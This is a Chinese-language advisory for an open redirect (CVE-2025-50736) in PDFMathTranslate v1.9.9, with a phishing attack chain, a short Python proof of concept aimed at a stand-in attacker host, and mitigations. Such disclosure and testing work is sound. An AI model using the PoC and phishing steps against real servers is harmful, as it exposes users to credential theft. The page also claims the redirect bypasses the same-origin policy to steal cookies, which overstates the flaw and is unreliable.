CVE-2025-50736 Byaidu PDFMathTranslate 开放重定向漏洞

漏洞信息

漏洞编号

CVE-2025-50736

漏洞类型

开放重定向

CVSS评分

6.1 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Byaidu PDFMathTranslate

漏洞概述

CVE-2025-50736是Byaidu PDFMathTranslate v1.9.9版本中的一个中危开放重定向（Open Redirect）漏洞。该漏洞存在于应用的/gradio_api端点，攻击者可以通过构造恶意的file参数值，使应用程序将用户重定向到任意的外部网站。由于该应用通常被用于PDF文档翻译处理，用户对这类工具具有较高的信任度，因此此漏洞可被用于实施网络钓鱼攻击，窃取用户的敏感信息如登录凭证、个人数据等。攻击者可以创建一个看似合法的链接，诱导用户点击后跳转到伪造的钓鱼网站，从而绕过安全过滤机制。由于该漏洞无需认证即可利用，且CVSS评分达到6.1，具有一定的安全风险。建议受影响的用户尽快升级到最新版本或采取临时缓解措施，避免遭受潜在的网络攻击。

技术细节

该开放重定向漏洞位于Byaidu PDFMathTranslate的/gradio_api端点。当应用程序处理file参数时，未对用户输入进行充分的验证和过滤，导致攻击者可以注入外部URL作为重定向目标。攻击者构造类似以下恶意链接：https://目标服务器/gradio_api?file=http://钓鱼网站.com，当受害者访问该链接时，应用程序会先处理请求然后将用户重定向到攻击者控制的外部网站。由于该应用主要用于PDF翻译，用户通常会放松警惕，这使得钓鱼攻击更容易成功。攻击者可以利用此漏洞绕过同源策略的安全限制，窃取用户的认证cookies、会话令牌或其他敏感信息。此漏洞的攻击复杂度较低（AC:L），但需要用户交互（UI:R），攻击者通常通过邮件、社交工程或恶意网页诱导用户点击恶意链接。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意file参数的URL，将重定向目标指向钓鱼网站

STEP 2

步骤2

攻击者通过邮件、社交媒体或恶意网页诱导目标用户点击该恶意链接

STEP 3

步骤3

用户访问恶意链接后，应用程序处理file参数并返回302重定向响应

STEP 4

步骤4

用户浏览器自动跟随重定向，跳转到攻击者控制的钓鱼网站

STEP 5

步骤5

钓鱼网站伪装成合法页面，诱导用户输入敏感信息如账号密码

STEP 6

步骤6

攻击者窃取用户凭证或进行其他恶意操作，完成攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# CVE-2025-50736 Open Redirect PoC
# Target: Byaidu PDFMathTranslate v1.9.9
# Endpoint: /gradio_api
# Parameter: file

target_url = "http://target-server/gradio_api"
malicious_redirect = "http://attacker-controlled-site.com"

# Construct the malicious URL with open redirect payload
params = {
    "file": malicious_redirect
}

# Send request to trigger redirect
response = requests.get(target_url, params=params, allow_redirects=False)

# Check if redirect header is present
if response.status_code in [301, 302, 303, 307, 308]:
    location = response.headers.get('Location')
    print(f"[+] Open Redirect Confirmed!")
    print(f"[+] Redirects to: {location}")
    if malicious_redirect in location:
        print("[+] Vulnerability Confirmed: Redirects to attacker-controlled domain")
else:
    print("[-] No redirect detected")

影响范围

Byaidu PDFMathTranslate v1.9.9

防御指南

临时缓解措施

在未安装官方补丁前，可通过以下措施临时缓解风险：1) 在Web应用防火墙(WAF)中配置规则，拦截包含外部域名的file参数请求；2) 使用反向代理限制对/gradio_api端点的访问；3) 提醒用户不要点击来源不明的PDF翻译链接；4) 监控日志中的异常重定向行为；5) 考虑暂时禁用PDFMathTranslate的在线访问功能。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-50736
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-50736
3 Details https://www.cvedetails.com/cve/CVE-2025-50736/
4 VulDB https://vuldb.com/cve/CVE-2025-50736
5 Link https://github.com/fai1424/Vulnerability-Research/tree/main/CVE-2025-50736
6 Link https://pdf2zh.com/